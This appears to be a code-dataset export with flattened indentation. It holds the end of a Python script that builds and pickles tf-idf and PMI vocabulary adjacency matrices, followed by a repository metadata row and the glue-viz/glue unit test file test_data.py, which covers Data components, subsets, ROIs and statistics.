shape=(vocab_size, vocab_size),
dtype=np.float32,
)
vocab_adj.setdiag(1.0)
print("Calculate isomorphic vocab adjacency matrix using doc's tf-idf...")
tfidf_all = sp.csr_matrix(
(tfidf_weight, (tfidf_row, tfidf_col)),
shape=(corpus_size, vocab_size),
dtype=np.float32,
)
tfidf_train = tfidf_all[:train_size]
tfidf_valid = tfidf_all[train_size : train_size + valid_size]
tfidf_test = tfidf_all[train_size + valid_size :]
tfidf_X_list = [tfidf_train, tfidf_valid, tfidf_test]
vocab_tfidf = tfidf_all.T.tolil()
for i in range(vocab_size):
norm = np.linalg.norm(vocab_tfidf.data[i])
if norm > 0:
vocab_tfidf.data[i] = (vocab_tfidf.data[i] / norm).tolist()
vocab_adj_tf = vocab_tfidf.dot(vocab_tfidf.T)
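# rows of vocab_tfidf are L2-normalized above, so vocab_adj_tf[i, j] is the
# cosine similarity between words i and j over their document tf-idf profiles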
# check
print("Check adjacent matrix...")
for k in range(len(adj_list)):
count = 0
for i in range(adj_list[k].shape[0]):
if adj_list[k][i, i] <= 0:
count += 1
print("No.%d adj, abnomal diagonal found, No.%d" % (k, i))
if count > 0:
print("No.%d adj, totoal %d zero diagonal found." % (k, count))
# dump objects
if will_dump_objects:
print("Dump objects...")
with open(dump_dir + "/data_%s.labels" % cfg_ds, "wb") as f:
pkl.dump([label2idx, idx2label], f)
with open(dump_dir + "/data_%s.vocab_map" % cfg_ds, "wb") as f:
pkl.dump(vocab_map, f)
with open(dump_dir + "/data_%s.vocab" % cfg_ds, "wb") as f:
pkl.dump(vocab, f)
with open(dump_dir + "/data_%s.adj_list" % cfg_ds, "wb") as f:
pkl.dump(adj_list, f)
with open(dump_dir + "/data_%s.y" % cfg_ds, "wb") as f:
pkl.dump(y, f)
with open(dump_dir + "/data_%s.y_prob" % cfg_ds, "wb") as f:
pkl.dump(y_prob, f)
with open(dump_dir + "/data_%s.train_y" % cfg_ds, "wb") as f:
pkl.dump(train_y, f)
with open(dump_dir + "/data_%s.train_y_prob" % cfg_ds, "wb") as f:
pkl.dump(train_y_prob, f)
with open(dump_dir + "/data_%s.valid_y" % cfg_ds, "wb") as f:
pkl.dump(valid_y, f)
with open(dump_dir + "/data_%s.valid_y_prob" % cfg_ds, "wb") as f:
pkl.dump(valid_y_prob, f)
with open(dump_dir + "/data_%s.test_y" % cfg_ds, "wb") as f:
pkl.dump(test_y, f)
with open(dump_dir + "/data_%s.test_y_prob" % cfg_ds, "wb") as f:
pkl.dump(test_y_prob, f)
with open(dump_dir + "/data_%s.tfidf_list" % cfg_ds, "wb") as f:
pkl.dump(tfidf_X_list, f)
with open(dump_dir + "/data_%s.vocab_adj_pmi" % (cfg_ds), "wb") as f:
pkl.dump(vocab_adj, f)
with open(dump_dir + "/data_%s.vocab_adj_tf" % (cfg_ds), "wb") as f:
pkl.dump(vocab_adj_tf, f)
with open(dump_dir + "/data_%s.shuffled_clean_docs" % cfg_ds, "wb") as f:
pkl.dump(shuffled_clean_docs, f)
print("Data prepared, spend %.2f s" % (time.time() - start))
|
b0233d3f3c258f3055f9a5d4b537c40b0cc1fd91
|
ce1c91c33d9b612e97361527e5a974996208c90d
|
/glue/core/tests/test_data.py
|
b20382da3f00dae5d13b31aeb53004fa6e91dca8
|
[
"BSD-3-Clause"
] |
permissive
|
glue-viz/glue
|
5f52faaf91e1ca4822d3983b6a4b9b60e8807f38
|
1a5c7676c025a1a025068b806f6f90ed53bba543
|
refs/heads/main
| 2023-09-04T09:24:00.519833
| 2023-08-17T09:40:04
| 2023-08-17T09:40:04
| 1,768,238
| 609
| 149
|
NOASSERTION
| 2023-09-13T20:56:14
| 2011-05-18T20:58:54
|
Python
|
UTF-8
|
Python
| false
| false
| 39,767
|
py
|
test_data.py
|
# pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103,R0903,R0904
import pytest
import numpy as np
from numpy.testing import assert_equal, assert_allclose
from unittest.mock import MagicMock
from astropy.utils import NumpyRNGContext
from glue import core
from ..component import Component, DerivedComponent, CategoricalComponent, DateTimeComponent
from ..component_id import ComponentID
from ..component_link import ComponentLink, CoordinateComponentLink, BinaryComponentLink
from ..coordinates import Coordinates, IdentityCoordinates
from ..data import Data, pixel_label
from ..link_helpers import LinkSame
from ..data_collection import DataCollection
from ..exceptions import IncompatibleAttribute
from ..hub import Hub
from ..registry import Registry
from ..subset import (Subset, CategoricalROISubsetState, SubsetState,
RoiSubsetState, RangeSubsetState, SliceSubsetState,
CategoricalMultiRangeSubsetState, MaskSubsetState,
CategoricalROISubsetState2D, AndState, roi_to_subset_state)
from ..roi import PolygonalROI, CategoricalROI, RangeROI, RectangularROI
from .test_state import clone
class _TestCoordinates(Coordinates):
def __init__(self):
super().__init__(pixel_n_dim=2, world_n_dim=2)
def pixel_to_world_values(self, *args):
return [(i + 2.) * a for i, a in enumerate(args)]
def world_to_pixel_values(self, *args):
return [a / (i + 2.) for i, a in enumerate(args)]
class TestData(object):
def setup_method(self, method):
self.data = Data(label="Test Data")
Registry().clear()
comp = Component(np.random.random((2, 3)))
self.comp = comp
self.data.coords = _TestCoordinates()
self.comp_id = self.data.add_component(comp, 'Test Component')
def test_2d_component_print(self):
assert str(self.comp) == 'Component with shape (2, 3)'
def test_shape_empty(self):
d = Data()
assert d.shape == ()
def test_ndim_empty(self):
d = Data()
assert d.ndim == 0
def test_shape(self):
assert self.data.shape == (2, 3)
def test_ndim(self):
assert self.data.ndim == 2
def test_size(self):
assert self.data.size == 6
def test_label(self):
d = Data()
assert d.label == ''
assert self.data.label == "Test Data"
def test_set_label(self):
d = Data()
d.label = 'test_set_label'
assert d.label == 'test_set_label'
def test_add_component_with_id(self):
cid = ComponentID("test")
comp = Component(np.random.random((2, 3)))
cid2 = self.data.add_component(comp, cid)
assert cid2 is cid
def test_add_component_via_setitem(self):
d = Data(x=[1, 2, 3])
d['y'] = d['x'] * 2
np.testing.assert_array_equal(d['y'], [2, 4, 6])
def test_add_component_incompatible_shape(self):
comp = MagicMock()
comp.data.shape = (3, 2)
with pytest.raises(TypeError) as exc:
self.data.add_component(comp("junk label"))
assert exc.value.args[0].endswith("add_component() missing 1 required "
"positional argument: 'label'")
def test_get_getitem_incompatible_attribute(self):
cid = ComponentID('bad')
with pytest.raises(IncompatibleAttribute) as exc:
self.data.__getitem__(cid)
assert exc.value.args[0] is cid
def test_get_component_incompatible_attribute(self):
cid = ComponentID('bad')
with pytest.raises(IncompatibleAttribute) as exc:
self.data.get_component(cid)
assert exc.value.args[0] is cid
def test_get_component_name(self):
d = Data(x=[1, 2, 3])
assert isinstance(d.get_component('x'), Component)
def test_component_ids(self):
cid = self.data.component_ids()
assert self.comp_id in cid
def test_new_subset(self):
sub = self.data.new_subset()
assert sub in self.data.subsets
def test_data_not_created_with_subsets(self):
assert len(self.data.subsets) == 0
def test_register(self):
hub = MagicMock(spec_set=Hub)
self.data.register_to_hub(hub)
assert hub is self.data.hub
def test_component_order(self):
"""Components should be returned in the order they were specified"""
data = Data()
comp = Component(np.array([1, 2, 3]))
labels = 'asldfkjaAREGWoibasiwnsldkgajsldkgslkg'
for label in labels:
data.add_component(comp, label)
ids = data.main_components
assert [cid.label for cid in ids] == list(labels)
def test_broadcast(self):
hub = MagicMock(spec_set=Hub)
# make sure broadcasting with no hub is ok
self.data.broadcast('testing')
# make sure broadcast with hub gets relayed
self.data.register_to_hub(hub)
self.data.broadcast('testing')
assert hub.broadcast.call_count == 1
def test_double_hub_add(self):
hub = MagicMock(spec_set=Hub)
hub2 = MagicMock(spec_set=Hub)
self.data.register_to_hub(hub)
with pytest.raises(AttributeError) as exc:
self.data.__setattr__('hub', hub2)
assert exc.value.args[0] == ("Data has already been assigned "
"to a different hub")
def test_main_components(self):
compid = ComponentID('virtual')
link = MagicMock(spec_set=ComponentLink)
comp = DerivedComponent(self.data, link)
self.data.add_component(comp, compid)
main_comps = self.data.main_components
assert self.comp_id in main_comps
assert compid not in main_comps
def test_add_component_invalid_component(self):
comp = Component(np.array([1]))
with pytest.raises(ValueError) as exc:
self.data.add_component(comp, label='bad')
assert exc.value.args[0].startswith("The dimensions of component bad")
def test_add_component_link(self):
link = MagicMock(spec_set=ComponentLink)
cid = ComponentID("new id")
link.get_to_id.return_value = cid
self.data.add_component_link(link)
assert cid in self.data.derived_components
def test_derived_components(self):
compid = ComponentID('virtual')
link = MagicMock(spec_set=ComponentLink)
comp = DerivedComponent(self.data, link)
self.data.add_component(comp, compid)
pricomps = self.data.derived_components
assert self.comp_id not in pricomps
assert compid in pricomps
def test_str_empty(self):
d = Data()
str(d)
def test_str_(self):
str(self.data)
def test_add_derived_component(self):
compid = ComponentID('virtual')
link = MagicMock(spec_set=ComponentLink)
comp = DerivedComponent(self.data, link)
comp.data.shape = self.data.shape
self.data.add_component(comp, compid)
result = self.data[compid]
link.compute.assert_called_with(self.data)
def test_find_component_id(self):
cid = self.data.find_component_id('Test Component')
assert cid == self.comp_id
assert self.data.find_component_id('does not exist') is None
def test_add_subset(self):
s = Subset(Data())
self.data.add_subset(s)
assert s in self.data.subsets
def test_add_subset_with_subset_state(self):
"""Passing a subset state auto-wraps into a subset object"""
state = SubsetState()
self.data.add_subset(state)
added = self.data.subsets[-1]
assert added.subset_state is state
assert added.data is self.data
def test_add_subset_reparents_subset(self):
"""add_subset method updates subset.data reference"""
s = Subset(None)
self.data.add_subset(s)
assert s.data is self.data
def test_add_subset_disambiguates_label(self):
"""adding subset should disambiguate label if needed"""
s1 = Subset(None)
self.data.add_subset(s1)
s1.label = "test_subset_label"
s2 = Subset(None)
s2.label = "test_subset_label"
assert s2.label == "test_subset_label"
self.data.add_subset(s2)
assert s2.label != "test_subset_label"
def test_add_subset_with_hub(self):
s = Subset(None)
hub = MagicMock(spec_set=Hub)
self.data.register_to_hub(hub)
self.data.add_subset(s)
assert s in self.data.subsets
assert hub.broadcast.call_count == 1
def test_remove_component(self):
hub = MagicMock(spec_set=Hub)
self.data.register_to_hub(hub)
self.data.remove_component(self.comp_id)
assert self.comp_id not in self.data.components
assert hub.broadcast.call_count == 2
def test_get_component(self):
assert self.data.get_component(self.comp_id) is self.comp
def test_get_None_component(self):
with pytest.raises(IncompatibleAttribute):
self.data.get_component(None)
def test_get_item(self):
assert self.data[self.comp_id] is self.comp.data
def test_coordinate_links(self):
links = self.data.coordinate_links
w0 = self.data[self.data.world_component_ids[0]]
w1 = self.data[self.data.world_component_ids[1]]
p0 = self.data[self.data.pixel_component_ids[0]]
p1 = self.data[self.data.pixel_component_ids[1]]
w0prime = links[0].compute(self.data)
p0prime = links[1].compute(self.data)
w1prime = links[2].compute(self.data)
p1prime = links[3].compute(self.data)
np.testing.assert_array_equal(w0, w0prime)
np.testing.assert_array_equal(w1, w1prime)
np.testing.assert_array_equal(p0, p0prime)
np.testing.assert_array_equal(p1, p1prime)
def test_coordinate_links_empty_data(self):
d = Data()
d.coords = None
assert d.coordinate_links == []
def test_coordinate_links_idempotent(self):
"""Should only calculate links once, and
return the same objects every time"""
links = self.data.coordinate_links
links2 = self.data.coordinate_links
assert links == links2
def test_fancy_view(self):
result = self.data[self.comp_id, :, 2]
np.testing.assert_array_equal(result, self.data[self.comp_id][:, 2])
def test_get_by_string(self):
result = self.data['Test Component']
assert result is self.comp.data
def test_get_by_missing_string(self):
with pytest.raises(IncompatibleAttribute) as exc:
result = self.data['xyz']
assert exc.value.args[0] == 'xyz'
def test_immutable(self):
d = Data(x=[1, 2, 3])
with pytest.raises(ValueError) as exc:
d['x'][:] = 5
assert 'read-only' in exc.value.args[0]
assert not d['x'].flags['WRITEABLE']
@pytest.mark.xfail
def test_categorical_immutable(self):
d = Data()
c = CategoricalComponent(['M', 'M', 'F'], categories=['M', 'F'])
d.add_component(c, label='gender')
with pytest.raises(ValueError) as exc:
d['gender'][:] = 5
assert 'read-only' in exc.value.args[0]
assert not d['gender'].flags['WRITEABLE']
def test_update_clears_subset_cache(self):
from ..roi import RectangularROI
d = Data(x=[1, 2, 3], y=[1, 2, 3])
s = d.new_subset()
state = core.subset.RoiSubsetState()
state.xatt = d.id['x']
state.yatt = d.id['y']
state.roi = RectangularROI(xmin=1.5, xmax=2.5, ymin=1.5, ymax=2.5)
s.subset_state = state
np.testing.assert_array_equal(s.to_mask(), [False, True, False])
d.update_components({d.id['x']: [10, 20, 30]})
np.testing.assert_array_equal(s.to_mask(), [False, False, False])
def test_add_derived_implicit(self):
# Regression test for a bug that caused derived components added via
# the data[...] = ... syntax to have links that did not include a 'to'
# argument, leading the link manager to add a ghost component to the
# data.
from ..data_collection import DataCollection
dc = DataCollection([])
data = Data(x=[1, 2, 3], y=[2, 3, 4], label='data1')
dc.append(data)
data['z'] = data.id['x'] + 1
# There should be four components: x, y, z, and pixel
assert len(data.components) == 4
def test_remove_derived_dependency(self):
# Regression test for a bug that occurred when removing a component
# used in a derived component, which should also remove the derived
# component itself. To make things more fun, we set up a chain of
# derived components to make sure they are all removed.
data = Data(a=[1, 2, 3], b=[2, 3, 4], label='data1')
data['c'] = data.id['a'] + 1
data['d'] = data.id['c'] + 1
data['e'] = data.id['d'] + 1
data['f'] = data.id['e'] + 1
a_id = data.id['a']
b_id = data.id['b']
c_id = data.id['c']
d_id = data.id['d']
e_id = data.id['e']
f_id = data.id['f']
# There should be seven components: pixel, a, b, c, d, e, f
assert len(data.components) == 7
data.remove_component(data.id['d'])
# This should also remove e and f since they depend on d
assert len(data.components) == 4
assert a_id in data.components
assert b_id in data.components
assert c_id in data.components
assert d_id not in data.components
assert e_id not in data.components
assert f_id not in data.components
def test_links_property(self):
data = Data(a=[1, 2, 3], b=[2, 3, 4], label='data1',
coords=IdentityCoordinates(n_dim=1))
assert len(data.links) == 2
assert isinstance(data.links[0], CoordinateComponentLink)
assert isinstance(data.links[1], CoordinateComponentLink)
data['c'] = data.id['a'] + 1
assert len(data.links) == 3
assert isinstance(data.links[2], BinaryComponentLink)
class TestROICreation(object):
def test_range_roi(self):
d = Data(xdata=[1, 2, 3], ydata=[1, 2, 3])
comp = d.get_component(d.id['xdata'])
roi = RangeROI('x', min=2, max=3)
s = roi_to_subset_state(roi, x_att='xdata')
assert isinstance(s, RangeSubsetState)
np.testing.assert_array_equal((s.lo, s.hi),
[2, 3])
roi = RangeROI('y', min=2, max=3)
s = roi_to_subset_state(roi,
x_att='xdata',
y_att='ydata')
assert isinstance(s, RangeSubsetState)
assert s.att == 'ydata'
def test_range_roi_categorical(self):
d = Data(x=['a', 'b', 'c'], y=[1, 2, 3])
comp = d.get_component(d.id['x'])
roi = CategoricalROI(['b', 'c'])
s = roi_to_subset_state(roi, x_att=d.id['x'], x_categories=comp.categories)
assert isinstance(s, CategoricalROISubsetState)
np.testing.assert_array_equal((s.roi.contains(['a', 'b', 'c'], None)),
[False, True, True])
roi = RangeROI('x', min=1, max=3)
s = roi_to_subset_state(roi, x_att='x', x_categories=comp.categories)
assert isinstance(s, CategoricalROISubsetState)
np.testing.assert_array_equal((s.roi.contains(['a', 'b', 'c'], None)),
[False, True, True])
def test_polygon_roi(self):
d = Data(x=[1, 1.3, 3, 10], y=[1, 1.5, 3, 10])
roi = PolygonalROI([0, 0, 2, 2], [0, 2, 2, 0])
s = roi_to_subset_state(roi, x_att=d.id['x'], y_att=d.id['y'])
assert isinstance(s, RoiSubsetState)
np.testing.assert_array_equal(s.to_mask(d), [True, True, False, False])
def test_polygon_categorical_rectangular(self):
d = Data(x=[1, 1.3, 3, 10], y=['a', 'b', 'c', 'd'])
y_comp = d.get_component(d.id['y'])
roi = PolygonalROI([0, 0, 2, 2], [0, 2, 2, 0])
s = roi_to_subset_state(roi, x_att='x', y_att='y', y_categories=y_comp.categories)
assert isinstance(s, CategoricalMultiRangeSubsetState)
np.testing.assert_array_equal(s.to_mask(d), [True, True, False, False])
def test_polygon_categorical_arbitrary(self):
d = Data(x=[1, 1.3, 3, 10], y=['a', 'b', 'c', 'd'])
y_comp = d.get_component(d.id['y'])
roi = PolygonalROI([0, 4, 4, 1, 0], [-0.5, 3.5, 0, -1, -0.5])
s = roi_to_subset_state(roi, x_att='x', y_att='y', y_categories=y_comp.categories)
assert isinstance(s, CategoricalMultiRangeSubsetState)
np.testing.assert_array_equal(s.to_mask(d), [True, False, True, False])
def test_rectangular_categorical(self):
d = Data(x=[1, 1.3, 3, 10], y=['a', 'b', 'c', 'd'])
x_comp = d.get_component(d.id['x'])
y_comp = d.get_component(d.id['y'])
roi = RectangularROI(xmin=-0.1, xmax=2.1, ymin=-0.1, ymax=2.1)
s = roi_to_subset_state(roi, x_att='x', y_att='y', y_categories=y_comp.categories)
assert isinstance(s, AndState)
np.testing.assert_array_equal(s.to_mask(d), [True, True, False, False])
s = roi_to_subset_state(roi, x_att='x', y_att='y', y_categories=y_comp.categories)
assert isinstance(s, AndState)
np.testing.assert_array_equal(s.to_mask(d), [True, True, False, False])
def test_polygon_both_categorical_arbitrary(self):
d = Data(x=['a', 'b', 'c', 'd', 'b', 'c'], y=['p', 'q', 'r', 's', 's', 'q'])
x_comp = d.get_component(d.id['x'])
y_comp = d.get_component(d.id['y'])
roi = PolygonalROI([0.5, 1.5, 2.5, 1, 0.5], [0.5, 0.5, 2.5, 3.5, 0.5])
s = roi_to_subset_state(roi,
x_att='x', x_categories=x_comp.categories,
y_att='y', y_categories=y_comp.categories)
assert isinstance(s, CategoricalROISubsetState2D)
np.testing.assert_array_equal(s.to_mask(d), [False, True, True, False, True, False])
def test_polygon_both_categorical_empty(self):
d = Data(x=['a', 'b', 'c', 'd', 'b', 'c'], y=['p', 'q', 'r', 's', 's', 'q'])
x_comp = d.get_component(d.id['x'])
y_comp = d.get_component(d.id['y'])
roi = PolygonalROI([0.5, 0.6, 0.6, 0.5], [0.5, 0.5, 0.6, 0.5])
s = roi_to_subset_state(roi,
x_att='x', x_categories=x_comp.categories,
y_att='y', y_categories=y_comp.categories)
assert isinstance(s, CategoricalROISubsetState2D)
np.testing.assert_array_equal(s.to_mask(d), [False, False, False, False, False, False])
def test_component_id_item_access():
data = Data()
c1 = Component(np.array([1, 2, 3]))
data.add_component(c1, 'values')
c2 = Component(np.array([4., 5., 6.]))
data.add_component(c2, 'Flux')
assert data.id['values'] == data.find_component_id('values')
assert data.id['Flux'] == data.find_component_id('Flux')
def test_component_id_item_access_missing():
"""id attribute should raise KeyError if requesting a bad ComponentID"""
data = Data()
with pytest.raises(KeyError):
data.id['not found']
class TestPixelLabel(object):
def test(self):
assert pixel_label(0, 2) == "0 [y]"
assert pixel_label(1, 2) == "1 [x]"
assert pixel_label(0, 3) == "0 [z]"
assert pixel_label(1, 3) == "1 [y]"
assert pixel_label(2, 3) == "2 [x]"
assert pixel_label(1, 0) == "1"
assert pixel_label(1, 4) == "1"
@pytest.mark.parametrize(('kwargs'),
[{'x': [1, 2, 3]},
{'x': np.array([1, 2, 3])},
{'x': [[1, 2, 3], [2, 3, 4]]},
{'x': [1, 2], 'y': [2, 3]}])
def test_init_with_inputs(kwargs):
"""Passing array-like objects as keywords to Data
auto-populates Components with label names = keywords"""
d = Data(**kwargs)
for label, data in kwargs.items():
np.testing.assert_array_equal(d[d.id[label]], data)
def test_init_with_invalid_kwargs():
with pytest.raises(ValueError) as exc:
d = Data(x=[1, 2], y=[1, 2, 3])
assert exc.value.args[0].startswith('The dimensions of component')
def test_getitem_with_component_link():
d = Data(x=[1, 2, 3, 4])
y = d.id['x'] * 5
np.testing.assert_array_equal(d[y], [5, 10, 15, 20])
def test_getitem_with_component_link_and_slice():
d = Data(x=[1, 2, 3, 4])
y = d.id['x'] * 5
np.testing.assert_array_equal(d[y, ::2], [5, 15])
def test_add_link_with_binary_link():
d = Data(x=[1, 2, 3, 4], y=[4, 5, 6, 7])
z = d.id['x'] + d.id['y']
d.add_component_link(z, 'z')
np.testing.assert_array_equal(d[d.id['z']], [5, 7, 9, 11])
def test_foreign_pixel_components_not_in_visible():
"""Pixel components from other data should not be visible"""
# currently, this is trivially satisfied since all coordinates are hidden
d1 = Data(x=[1], y=[2], coords=IdentityCoordinates(n_dim=1))
d2 = Data(w=[3], v=[4], coords=IdentityCoordinates(n_dim=1))
dc = DataCollection([d1, d2])
dc.add_link(LinkSame(d1.id['x'], d2.id['w']))
dc.add_link(LinkSame(d1.world_component_ids[0],
d2.world_component_ids[0]))
assert d2.pixel_component_ids[0] not in d1.main_components
np.testing.assert_array_equal(d1[d2.pixel_component_ids[0]], [0])
def test_add_binary_component():
d = Data(x=[1, 2, 3], y=[2, 3, 4])
z = d.id['x'] + d.id['y']
d.add_component(z, label='z')
np.testing.assert_array_equal(d['z'], [3, 5, 7])
EXPECTED_STR = """
Data Set: mydata
Number of dimensions: 1
Shape: 3
Main components:
- x
- y
Coordinate components:
- Pixel Axis 0 [x]
""".strip()
def test_data_str():
# Regression test for Data.__str__
d = Data(x=[1, 2, 3], y=[2, 3, 4], label='mydata')
assert str(d) == EXPECTED_STR
EXPECTED_STR_WITH_DERIVED = """
Data Set: mydata
Number of dimensions: 1
Shape: 3
Main components:
- x
- y
Derived components:
- z
Coordinate components:
- Pixel Axis 0 [x]
""".strip()
def test_data_str_with_derived():
d = Data(x=[1, 2, 3], y=[2, 3, 4], label='mydata')
d['z'] = d.id['x'] + 1
assert str(d) == EXPECTED_STR_WITH_DERIVED
def test_update_values_from_data():
d1 = Data(a=[1, 2, 3], b=[4, 5, 6], label='banana')
d2 = Data(b=[1, 2, 3, 4], c=[5, 6, 7, 8], label='apple')
d1a = d1.id['a']
d1b = d1.id['b']
d2b = d2.id['b']
d2c = d2.id['c']
d1.update_values_from_data(d2)
assert d1a not in d1.components
assert d1b in d1.components
assert d2b not in d1.components
assert d2c not in d1.components
assert [cid.label for cid in d1.main_components] == ['b', 'c']
assert d1.shape == (4,)
def test_update_values_from_data_invalid():
d1 = Data(a=[1, 2, 3], label='banana')
d1.add_component([3, 4, 5], 'a')
d2 = Data(b=[1, 2, 3, 4], c=[5, 6, 7, 8], label='apple')
with pytest.raises(ValueError) as exc:
d1.update_values_from_data(d2)
assert exc.value.args[0] == "Non-unique component labels in original data"
d1 = Data(a=[1, 2, 3], b=[4, 5, 6], label='banana')
d2 = Data(b=[1, 2, 3, 4], label='apple')
d2.add_component([5, 6, 7, 8], 'b')
with pytest.raises(ValueError) as exc:
d1.update_values_from_data(d2)
assert exc.value.args[0] == "Non-unique component labels in new data"
def test_update_values_from_data_order():
# Make sure that the order of components is preserved when calling
# Data.update_values_from_data. The final order should be first
# components that existed before, followed by new components
d1 = Data()
d1['c'] = [1, 2, 3]
d1['b'] = [2, 3, 4]
d1['j'] = [0, 1, 2]
d1['a'] = [4, 4, 4]
d1['f'] = [4, 5, 6]
d2 = Data()
d2['h'] = [4, 4, 4]
d2['j'] = [0, 1, 2]
d2['a'] = [4, 4, 4]
d2.update_values_from_data(d1)
assert [cid.label for cid in d2.main_components] == ['j', 'a', 'c', 'b', 'f']
def test_find_component_id_with_cid():
# Regression test for a bug that caused Data.find_component_id to return
# True erroneously when passing a component ID.
d1 = Data()
d1['a'] = ['a', 'b', 'c']
d1['b'] = [1, 2, 3]
assert d1.find_component_id(d1.id['a']) is d1.id['a']
assert d1.find_component_id(d1.id['b']) is d1.id['b']
def test_parent_preserved_session():
# Regression test for a bug that caused ComponentID parents to not be
# preserved when saving and restoring a session.
from ..link_helpers import LinkSame
from ..data_collection import DataCollection
d1 = Data(x=[1], y=[2], label='test1')
d2 = Data(w=[3], v=[4], label='test2')
dc = DataCollection([d1, d2])
dc.add_link(LinkSame(d1.id['x'], d2.id['w']))
assert d1.id['x'].parent is d1
assert d1.id['y'].parent is d1
assert d2.id['w'].parent is d2
assert d2.id['v'].parent is d2
dc2 = clone(dc)
assert dc2[0].id['x'].parent.label == 'test1'
assert dc2[0].id['y'].parent.label == 'test1'
assert dc2[1].id['w'].parent.label == 'test2'
assert dc2[1].id['v'].parent.label == 'test2'
def test_preserve_datetime():
# Make sure that we recognize and preserve the Numpy datetime64 format
dates = np.array([1, 2, 3], dtype='M8[D]')
data = Data(dates=dates)
assert isinstance(data.get_component('dates'), DateTimeComponent)
def test_clone_meta():
# Regression test for a bug that caused metadata to not be preserved
# when saving/loading sessions.
class CustomObject(object):
pass
data1 = Data(x=[1, 2, 3])
data1.meta['a'] = 1
data1.meta['b'] = 'test'
data1.meta['c'] = CustomObject()
data2 = clone(data1)
assert data2.meta['a'] == 1
assert data2.meta['b'] == 'test'
assert 'c' not in data2.meta
def test_update_coords():
# Make sure that when overriding coords, the world coordinate components
# are updated.
data1 = Data(x=[1, 2, 3], coords=IdentityCoordinates(n_dim=1))
assert len(data1.components) == 3
assert_equal(data1[data1.world_component_ids[0]], [0, 1, 2])
data2 = Data(x=[1, 2, 3], coords=IdentityCoordinates(n_dim=1))
assert len(data1.links) == 2
assert len(data2.links) == 2
data_collection = DataCollection([data1, data2])
assert len(data_collection.links) == 4
data_collection.add_link(LinkSame(data1.world_component_ids[0], data2.world_component_ids[0]))
assert len(data_collection.links) == 5
class CustomCoordinates(Coordinates):
def __init__(self):
super().__init__(pixel_n_dim=1, world_n_dim=1)
@property
def world_axis_names(self):
return ['Custom {0}'.format(axis) for axis in range(3)]
def world_to_pixel_values(self, *world):
if self.pixel_n_dim == 1:
return 0.4 * world[0]
else:
return tuple([0.4 * w for w in world])
def pixel_to_world_values(self, *pixel):
if self.world_n_dim == 1:
return 2.5 * pixel[0]
else:
return tuple([2.5 * p for p in pixel])
data1.coords = CustomCoordinates()
assert len(data1.components) == 3
assert_equal(data1[data1.world_component_ids[0]], [0, 2.5, 5])
assert sorted(cid.label for cid in data1.world_component_ids) == ['Custom 0']
    # The link between the two world coordinates should be removed
assert len(data_collection.links) == 4
def test_compute_statistic_subset():
data = Data(x=list(range(10)))
result = data.compute_statistic('mean', data.id['x'], subset_state=data.id['x'] > 5)
assert_allclose(result, 7.5)
subset_state = SliceSubsetState(data, [slice(5)])
result = data.compute_statistic('mean', data.id['x'], subset_state=subset_state)
assert_allclose(result, 2.0)
@pytest.mark.parametrize('shape', (100, (30, 10), (500, 1, 30)))
def test_compute_statistic_chunks(shape):
# Make sure that when using chunks, the result is the same as without.
data = Data(x=np.random.random(shape))
axis = tuple(range(data.ndim - 1))
assert_allclose(data.compute_statistic('mean', data.id['x'], axis=axis),
data.compute_statistic('mean', data.id['x'], axis=axis, n_chunk_max=10))
subset_state = SliceSubsetState(data, [slice(5)])
stats = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
subset_state = data.id['x'] > 0.25
stats = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
roi = RangeROI('x', min=0.1, max=0.95)
subset_state = roi_to_subset_state(roi, x_att='x')
stats = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
if data.ndim < 3:
return
assert_allclose(data.compute_statistic('mean', data.id['x'], axis=2),
data.compute_statistic('mean', data.id['x'], axis=2, n_chunk_max=10))
subset_state = SliceSubsetState(data, [slice(5)])
stats = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
subset_state = data.id['x'] > 0.25
stats = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
roi = RangeROI('x', min=0.1, max=0.95)
subset_state = roi_to_subset_state(roi, x_att='x')
stats = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
def test_compute_statistic_random_subset():
data = Data(x=list(range(10)))
with NumpyRNGContext(12345):
result = data.compute_statistic('mean', data.id['x'], random_subset=5)
assert_allclose(result, 4.2)
result = data.compute_statistic('mean', data.id['x'], random_subset=5,
subset_state=MaskSubsetState([0, 1, 0, 1, 1, 1, 0, 1, 0, 1],
data.pixel_component_ids))
assert_allclose(result, 5)
def test_compute_statistic_empty_subset():
data = Data(x=np.empty((30, 20, 40)))
# A default subset state should be empty
subset_state = SubsetState()
result = data.compute_statistic('mean', data.id['x'], subset_state=subset_state)
assert_equal(result, np.nan)
result = data.compute_statistic('maximum', data.id['x'], subset_state=subset_state, axis=1)
assert_equal(result, np.broadcast_to(np.nan, (30, 40)))
result = data.compute_statistic('median', data.id['x'], subset_state=subset_state, axis=(1, 2))
assert_equal(result, np.broadcast_to(np.nan, (30)))
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state, axis=(0, 1, 2))
assert_equal(result, np.nan)
def test_compute_statistic_efficient():
# Unit test to test the logic for dealing with accessing only a minimal
# region from the data based on the smallest array that covers a given
# subset state.
array = np.ones(10 * 20 * 30 * 40).reshape((10, 20, 40, 30))
array[3:5, 6:14, :, 10:21:2] += 1
class CustomData(Data):
def get_data(self, cid, view=None):
if cid.label == 'x':
self.elements_accessed = np.ones(self.shape)[view].sum()
else:
self.elements_accessed = 0
return super().get_data(cid, view=view)
data = CustomData(x=array, y=array)
subset_state = data.id['y'] > 1.5
# First test without view
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state)
assert_allclose(result, 7680)
assert data.elements_accessed == 7040
